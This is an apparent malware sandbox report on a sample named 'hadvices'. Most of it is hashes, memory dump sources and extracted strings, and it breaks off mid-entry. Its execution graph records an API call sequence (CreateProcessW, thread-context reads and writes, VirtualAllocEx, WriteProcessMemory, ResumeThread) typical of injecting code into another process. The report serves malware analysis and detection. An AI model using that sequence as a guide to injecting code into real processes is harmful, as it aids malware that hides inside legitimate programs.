                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction ID: 141d00dcf02e0b8f29e4104d0b8054a5580f9ba0704c2e0073df697dd715e98f
                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction Fuzzy Hash: 1D01447115CB088FD744EF0CE455AA5B7E0FB99364F10056DE58AC3661DA26E882CB45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:25
                                                      Total number of Limit Nodes:1
                                                      execution_graph (rendered in the original report; raw node/edge list omitted). API call nodes in graph order: CreateProcessW (157b558), Wow64GetThreadContext (1579b28), ReadProcessMemory (1579b40), VirtualAllocEx (157a758), WriteProcessMemory (157a600, reached three times), Wow64SetThreadContext (157a4d8), ResumeThread (157a878).

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph for function 1579b1c (rendered in the original report; raw basic-block edge list omitted). The CreateProcessW call sits in block 157b66f-157b73c.
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0157B729
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: b3f9a9129457d0d3aa3b868523903c0cad127dff11f1e3bf8a83e40ea7105e3a
                                                      • Instruction ID: 5fc9591535a30395c44c81dfea0d120215c81c9bc3e7b0547808be2b4f7a6f61
                                                      • Opcode Fuzzy Hash: b3f9a9129457d0d3aa3b868523903c0cad127dff11f1e3bf8a83e40ea7105e3a
                                                      • Instruction Fuzzy Hash: 0681CF75C002698FDB25CFA9D884BDDBBF5BB09300F1491AAE509B7260EB309A85CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 44a4de7640ba37c76b2da2f782b564b330e166c182780cafba7e1c326abe3c6e
                                                      • Instruction ID: b41f12c7b565fdc41dd49c9e848454e35b3f8e14faff430754d4a54ff99e52c8
                                                      • Opcode Fuzzy Hash: 44a4de7640ba37c76b2da2f782b564b330e166c182780cafba7e1c326abe3c6e
                                                      • Instruction Fuzzy Hash: 0D41CAB4D012589FCF10CFA9D984ADEFBF1BB49310F14902AE819BB240D735AA41CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0157BA35
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 2b546869acb12ad15963f315f9a43acd6b379fe1caba31924dfc844d4d966c6c
                                                      • Instruction ID: d3ab5d80d3b3b944703677869748bfdef55c341d0e70c8d1df3e35559adc9165
                                                      • Opcode Fuzzy Hash: 2b546869acb12ad15963f315f9a43acd6b379fe1caba31924dfc844d4d966c6c
                                                      • Instruction Fuzzy Hash: DF4177B9D042589FCF10DFAAE984ADEFBB1BB19310F10902AE814BB210D375A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0157A802
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 7517d2de4889325f635aea36db0a4c9aa6cef213428cf456928853b1a0e65dd6
                                                      • Instruction ID: 3ed258743b3480573dc9668baa83987f1680b7464cadf893e54ea7ba54caeeb4
                                                      • Opcode Fuzzy Hash: 7517d2de4889325f635aea36db0a4c9aa6cef213428cf456928853b1a0e65dd6
                                                      • Instruction Fuzzy Hash: 883198B8D002589FCF10CFA9D985ADEFBB1BB49310F14942AE815BB310D735A902CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0157A587
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: cb4014c715cc67653ea7134b084d2ec537687493dcd3fc3e07dc013ef7624497
                                                      • Instruction ID: 936b35e48ea32821ab25f6de336c7baf98c4e9e9795110ff8efdb9e4eb3ec0f7
                                                      • Opcode Fuzzy Hash: cb4014c715cc67653ea7134b084d2ec537687493dcd3fc3e07dc013ef7624497
                                                      • Instruction Fuzzy Hash: E931BBB4D012589FDF14DFAAD885AEEFBF1BB49310F14802AE415BB240D738A945CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Wow64GetThreadContext.KERNEL32(?,?), ref: 0157B922
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 38514ce5738f674b4c78cd85b9729852e7477e08ec3177ab1b0a28ebce7b152a
                                                      • Instruction ID: 8644220b25f7eedff44bb985e05f56178e7fb56779f8f785c78e0e3a0078ccf8
                                                      • Opcode Fuzzy Hash: 38514ce5738f674b4c78cd85b9729852e7477e08ec3177ab1b0a28ebce7b152a
                                                      • Instruction Fuzzy Hash: A631ABB5D012589FCB10CFAAE485AEEFBF1BB08314F14902AE418BB350D378A945CF64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0157A8F6
                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1414092558.0000000001570000.00000040.00000800.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_1570000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 77c273a9a0023fcca4bb5698e5d9dc92d1862ebfc97516a8a1c0cc8764339ea4
                                                      • Instruction ID: f47aa2e7d45e2c4418fc9f82ad9963c5b77d1babc3614fc5d3071ac430fcff0e
                                                      • Opcode Fuzzy Hash: 77c273a9a0023fcca4bb5698e5d9dc92d1862ebfc97516a8a1c0cc8764339ea4
                                                      • Instruction Fuzzy Hash: 5131AAB4D013189FDB24CFAAE885A9EFBF5BB49310F14942AE815B7340D735A902CF58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1412369316.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_111d000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e90dbda22ba9a1a2a14769e263c08977c163c1c2d1a739aeeac06aee475406c6
                                                      • Instruction ID: 95c816adaf4f9aaedfdfc75b97680b5f9f3ff34d015045fe496e2781c71a463e
                                                      • Opcode Fuzzy Hash: e90dbda22ba9a1a2a14769e263c08977c163c1c2d1a739aeeac06aee475406c6
                                                      • Instruction Fuzzy Hash: F12103B1504200DFDF19DF54E9C8B16FF65FB84324F208979E8090B24AC336D456CAA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000017.00000002.1412369316.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_23_2_111d000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction ID: f91dfb1285eeb5338708913e5bb3c2b49cbabc144312c08a3746ae33ffb31f83
                                                      • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                      • Instruction Fuzzy Hash: 9411AF76504240CFCF1ACF54D9C4B16FF62FB84324F2486A9D8090B25BC336D456CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:14.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:52
                                                      Total number of Limit Nodes:9

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 13e78da045e626b1b64eddc5d368fb2c3e58258c6d5fa2b9157aa5f7ee2f8b45
                                                      • Instruction ID: bf1440b4e3f887bd79c02f63a5fb210549955f730308c13984ca688e9437979c
                                                      • Opcode Fuzzy Hash: 13e78da045e626b1b64eddc5d368fb2c3e58258c6d5fa2b9157aa5f7ee2f8b45
                                                      • Instruction Fuzzy Hash: 88E1D575A00218CFDB14DFA9D984A9DFBB2FF89310F1580A9E919AB361DB30AD41CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: b51effb803dfb12b9710269b4b6a74bdff1737ad232bd0db50fdd0756a2d9235
                                                      • Instruction ID: b994af874eabc2d38dcc92c3ea52919c9fa104cbbe43fd1bc22ca6bb32575f26
                                                      • Opcode Fuzzy Hash: b51effb803dfb12b9710269b4b6a74bdff1737ad232bd0db50fdd0756a2d9235
                                                      • Instruction Fuzzy Hash: 6091C374E00208CFDB15DFAAD984A9DFBF2BF89314F1480A9E819AB355DB315982CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 5abf784058dfbbbbe9c958dec7276bec7ce24d32a03eb6ad0e2e050ad23b339d
                                                      • Instruction ID: bea8d358195892704fdc7582dcfb451b7ef2c8c202e69d3ed7f6cf394b50fb99
                                                      • Opcode Fuzzy Hash: 5abf784058dfbbbbe9c958dec7276bec7ce24d32a03eb6ad0e2e050ad23b339d
                                                      • Instruction Fuzzy Hash: EC81B274E04219CFEB15DFAAD884A9DFBF2BF89310F148069E809AB365DB349941CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 9c3e4f7525bcbbf27d0bdfa36052fa6136799ea04329cb14df110e04fc14f02c
                                                      • Instruction ID: a91dc1bfac847f9bfdce613e8026bd0ca77e964a103622bb222a2d72a70cbb82
                                                      • Opcode Fuzzy Hash: 9c3e4f7525bcbbf27d0bdfa36052fa6136799ea04329cb14df110e04fc14f02c
                                                      • Instruction Fuzzy Hash: 8781C474E00209CFDB15DFAAD984A9DFBF2BF89301F1480A9E809AB365DB349945CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: cf57290e52299de6af2e35cb9358ac62f9f0e16e807bb18e7f6c7b4c8619ef5f
                                                      • Instruction ID: cb2bd99ef33340d68d4f0d56187defeff6776550e2c391e88b6d2f80e0a3e694
                                                      • Opcode Fuzzy Hash: cf57290e52299de6af2e35cb9358ac62f9f0e16e807bb18e7f6c7b4c8619ef5f
                                                      • Instruction Fuzzy Hash: F981B274E002089FEB14DFAAD984A9DFBF2BF88310F14D069E409AB365DB345941CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 177bc32; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 28e25762e749354c534523e8a0b6c798461ae30e056102f6fcd1ebca5529ef96
                                                      • Instruction ID: b1bc6410c824bc83d04e565f022946f0fc59b3c9b0a400d3f96179d7a7d73a7c
                                                      • Opcode Fuzzy Hash: 28e25762e749354c534523e8a0b6c798461ae30e056102f6fcd1ebca5529ef96
                                                      • Instruction Fuzzy Hash: F581A074E002088FEB14DFAAD984A9DFBF2BF88311F148069E909AB365DB745981CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 177c7b2; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 18c2675182403841c21b7974e811c57f2988ab6d22105c8426b5c0381fa8d081
                                                      • Instruction ID: 3f97a644c857621f7698501ec1dbf8b12d84f1e0c13421ec6ad33ac38645beb6
                                                      • Opcode Fuzzy Hash: 18c2675182403841c21b7974e811c57f2988ab6d22105c8426b5c0381fa8d081
                                                      • Instruction Fuzzy Hash: 6781B374E00219DFEB54DFAAD984A9DFBF2BF88311F148069E409AB355DB349981CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 1774b31; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$LjEp$LjEp$PHq$PHq
                                                      • API String ID: 0-3801734409
                                                      • Opcode ID: 50de3461691fa03481525c94551b6ed10f340d544eb3a843ff7c8856f0afec65
                                                      • Instruction ID: 7c7996507e66e892e19de04b3cc97872d3ab7b2dee90318f4a40bd6c4c9d6d7e
                                                      • Opcode Fuzzy Hash: 50de3461691fa03481525c94551b6ed10f340d544eb3a843ff7c8856f0afec65
                                                      • Instruction Fuzzy Hash: DE818074E00218DFEB14DFAAD984A9DFBF2BF88311F148069E819AB365DB345981CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 1776790; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$(oq$,q$,q
                                                      • API String ID: 0-620556200
                                                      • Opcode ID: 185d31feeb2eb9a1132fd6a624918381402e8eb54c6d2fd82de7057ae56dec3c
                                                      • Instruction ID: 84a42a40e3df0ec286ea7c453ce7d99ced4b48f97589db464401d626b2790acc
                                                      • Opcode Fuzzy Hash: 185d31feeb2eb9a1132fd6a624918381402e8eb54c6d2fd82de7057ae56dec3c
                                                      • Instruction Fuzzy Hash: FF024970A006199FEF14DFA9C984AAEFBB2FF89310F158069F515AB269D730EC41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 1667550; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq$p@q
                                                      • API String ID: 0-1517855525
                                                      • Opcode ID: 346a047af7ca71335e63075121a3c007e3a93bbc97e86cd6765b5d363e59fb94
                                                      • Instruction ID: 10c155802489507ae2911425b7b42a98ee91819a70116bc7642a17e0e1bba3b5
                                                      • Opcode Fuzzy Hash: 346a047af7ca71335e63075121a3c007e3a93bbc97e86cd6765b5d363e59fb94
                                                      • Instruction Fuzzy Hash: 3882AF74A012298FDB65DF25C994BD9BBB2FF89301F1081E9D909A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 177b552; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oEp$PHq$PHq
                                                      • API String ID: 0-1671885247
                                                      • Opcode ID: 9fae4aaad278d81803c5388e948326edbbffd944ad7a8ccc661a997e37c8afba
                                                      • Instruction ID: 3a0527462bca5e5d86cd6432257cb0be900d68b522c4b216c5b7072f06b063a3
                                                      • Opcode Fuzzy Hash: 9fae4aaad278d81803c5388e948326edbbffd944ad7a8ccc661a997e37c8afba
                                                      • Instruction Fuzzy Hash: 5F618274E006089FEF18DFAAD984A9DFBF2BF88310F14806AE519AB365DB345941CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$4'q
                                                      • API String ID: 0-1336004174
                                                      • Opcode ID: d3850fc84615699070ae30c2ea0c92422092d5270620395a8d84e5844df65765
                                                      • Instruction ID: 54a339fc3c53177cd29b5b2e2e91c62b03d24477d8831df34bb2494c4c2516e6
                                                      • Opcode Fuzzy Hash: d3850fc84615699070ae30c2ea0c92422092d5270620395a8d84e5844df65765
                                                      • Instruction Fuzzy Hash: 9172BD30A00219DFDF15CF68C984AAEFBF2FF89310F198559E9059B2A5D731E981CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 166793b; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: efb83d8c4195c666e5fcc7a0658508c6a07c4e36490be9b6a08ba96507dcf90d
                                                      • Instruction ID: 45de4112f631be24f9bc79799084bb72bfdfa6830629cd83d625a82635d0a266
                                                      • Opcode Fuzzy Hash: efb83d8c4195c666e5fcc7a0658508c6a07c4e36490be9b6a08ba96507dcf90d
                                                      • Instruction Fuzzy Hash: 0252AB74A01229CFDB64DF65C994BD9BBB2FB89301F1085E9D809A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 1667939; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: 00ce6c404cacd77374f34048f526edcc80d3a66af641c261f4af08f09ec4bd55
                                                      • Instruction ID: 67d8717a6728dda59a05ac066eccb0f3d9505e2e78fdfb05c049190b3784a678
                                                      • Opcode Fuzzy Hash: 00ce6c404cacd77374f34048f526edcc80d3a66af641c261f4af08f09ec4bd55
                                                      • Instruction Fuzzy Hash: 5D52AA74A01228CFDB64DF65C994BD9BBB2FB89301F1085E9D809A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$Hq
                                                      • API String ID: 0-2917151738
                                                      • Opcode ID: 6e2da592adbe0f106c5844e8128ef3eeec9edd0f16fc8791296da1ba35cf0680
                                                      • Instruction ID: cd1cb2172c6752b7713c17a1fcd19eae667a477c1fd1df3996c86843fc53cd29
                                                      • Opcode Fuzzy Hash: 6e2da592adbe0f106c5844e8128ef3eeec9edd0f16fc8791296da1ba35cf0680
                                                      • Instruction Fuzzy Hash: 9D128F70A006198FEB18DF69D954BAEBBF2BF88310F248169E505DB359EB34DD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5218cc211b4d18ad657abf501b65da8155dac8ce997556e44e0f20cbe1ebb204
                                                      • Instruction ID: 1b81a315ac0e3964311a67811fa006f1fe28306792b157430e33d219bf947830
                                                      • Opcode Fuzzy Hash: 5218cc211b4d18ad657abf501b65da8155dac8ce997556e44e0f20cbe1ebb204
                                                      • Instruction Fuzzy Hash: 5E72BB74E012288FEB64DF69C984BE9FBB2BB49300F1481EAD459A7355DB349E81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2acd1827d1c7b21afb8cfcb3b415d2a5b040f1f5af99ab4e7d533968d78c08fd
                                                      • Instruction ID: afd64c4e5a1b9c38f5ed1ac719ee0aa3c8307da1f20a885ad7372b1086a3ebd8
                                                      • Opcode Fuzzy Hash: 2acd1827d1c7b21afb8cfcb3b415d2a5b040f1f5af99ab4e7d533968d78c08fd
                                                      • Instruction Fuzzy Hash: E3D19E74E00218CFEB14DFA5D994B9DBBB2BF89301F1081A9D809AB355DB359E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (first basic block 1776eb8; raw edge list not reproduced)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                      • API String ID: 0-2212926057
                                                      • Opcode ID: 9053c134c32814e3f26b47bc36827ad26d39de215d6e94b425606983d96054af
                                                      • Instruction ID: b88722b96bdb1b6aa563a1e01fc5b5f32fd66e40393bc3c84f0bea1ce47dcaa6
                                                      • Opcode Fuzzy Hash: 9053c134c32814e3f26b47bc36827ad26d39de215d6e94b425606983d96054af
                                                      • Instruction Fuzzy Hash: E0124A30A002499FDF29DF68D988A9DFBF2BF48314F148599E919DB261D730ED41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph
                                                      Control-flow graph (rendered image not captured in this extraction): basic blocks 1777850-17783d6, with a call to 1778849.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q
                                                      • API String ID: 0-3126353813
                                                      • Opcode ID: 813249f4119901f5fb91c21c8a94eb1542d07ee8c7a30fa460cc15e83420ecfa
                                                      • Instruction ID: b8dcb5eabd2923b65b5dec054635d47d7f98f76bb0f22b984dabffb4c3a99508
                                                      • Opcode Fuzzy Hash: 813249f4119901f5fb91c21c8a94eb1542d07ee8c7a30fa460cc15e83420ecfa
                                                      • Instruction Fuzzy Hash: FE52F134E002198FEB64DBA8C854B9EBB72FF98301F1081A9D10A6B7A4DF355D86DF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q$4'q
                                                      • API String ID: 0-1467158625
                                                      • Opcode ID: 3a111ee88e5b1b55ab8446d524236dc40643beadabb47bf76e03a93d23f539d4
                                                      • Instruction ID: 5d3a9c841820c775af6a6010bb546b0c268d880ed9ec96ab5bb10d6271f2065f
                                                      • Opcode Fuzzy Hash: 3a111ee88e5b1b55ab8446d524236dc40643beadabb47bf76e03a93d23f539d4
